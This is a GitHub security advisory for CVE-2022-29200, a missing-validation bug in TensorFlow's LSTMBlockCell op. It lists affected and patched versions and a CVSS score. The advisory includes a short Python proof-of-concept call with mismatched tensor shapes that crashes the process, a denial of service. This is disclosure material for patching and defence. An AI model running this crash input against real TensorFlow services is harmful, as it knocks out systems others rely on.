Skip to content

Missing validation causes denial of service via `LSTMBlockCell`

Moderate severity GitHub Reviewed Published May 17, 2022 in tensorflow/tensorflow • Updated Jul 21, 2023

Package

pip tensorflow (pip)

Affected versions

< 2.6.4
>= 2.7.0, < 2.7.2
>= 2.8.0, < 2.8.1

Patched versions

2.6.4
2.7.2
2.8.1
pip tensorflow-cpu (pip)
< 2.6.4
>= 2.7.0, < 2.7.2
>= 2.8.0, < 2.8.1
2.6.4
2.7.2
2.8.1
pip tensorflow-gpu (pip)
< 2.6.4
>= 2.7.0, < 2.7.2
>= 2.8.0, < 2.8.1
2.6.4
2.7.2
2.8.1

Description

Impact

The implementation of tf.raw_ops.LSTMBlockCell does not fully validate the input arguments. This results in a CHECK-failure which can be used to trigger a denial of service attack:

import tensorflow as tf

tf.raw_ops.LSTMBlockCell( 
  x=tf.constant(0.837607, shape=[28,29], dtype=tf.float32),
  cs_prev=tf.constant(0, shape=[28,17], dtype=tf.float32),
  h_prev=tf.constant(0.592631638, shape=[28,17], dtype=tf.float32),
  w=tf.constant(0.887386262, shape=[46,68], dtype=tf.float32),
  wci=tf.constant(0, shape=[], dtype=tf.float32),
  wcf=tf.constant(0, shape=[17], dtype=tf.float32),
  wco=tf.constant(0.592631638, shape=[28,17], dtype=tf.float32),
  b=tf.constant(0.75259006, shape=[68], dtype=tf.float32),
  forget_bias=1, cell_clip=0, use_peephole=False)

The code does not validate the ranks of any of the arguments to this API call. This results in CHECK-failures when the elements of the tensor are accessed.

Patches

We have patched the issue in GitHub commit 803404044ae7a1efac48ba82d74111fce1ddb09a.

The fix will be included in TensorFlow 2.9.0. We will also cherrypick this commit on TensorFlow 2.8.1, TensorFlow 2.7.2, and TensorFlow 2.6.4, as these are also affected and still in supported range.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Neophytos Christou from Secure Systems Lab at Brown University.

References

@mihaimaruseac mihaimaruseac published to tensorflow/tensorflow May 17, 2022
Published by the National Vulnerability Database May 20, 2022
Published to the GitHub Advisory Database May 24, 2022
Reviewed May 24, 2022
Last updated Jul 21, 2023

Severity

Moderate
5.5
/ 10

CVSS base metrics

Attack vector
Local
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE ID

CVE-2022-29200

GHSA ID

GHSA-2vv3-56qg-g2cf

Source code

Checking history
See something to contribute? Suggest improvements for this vulnerability.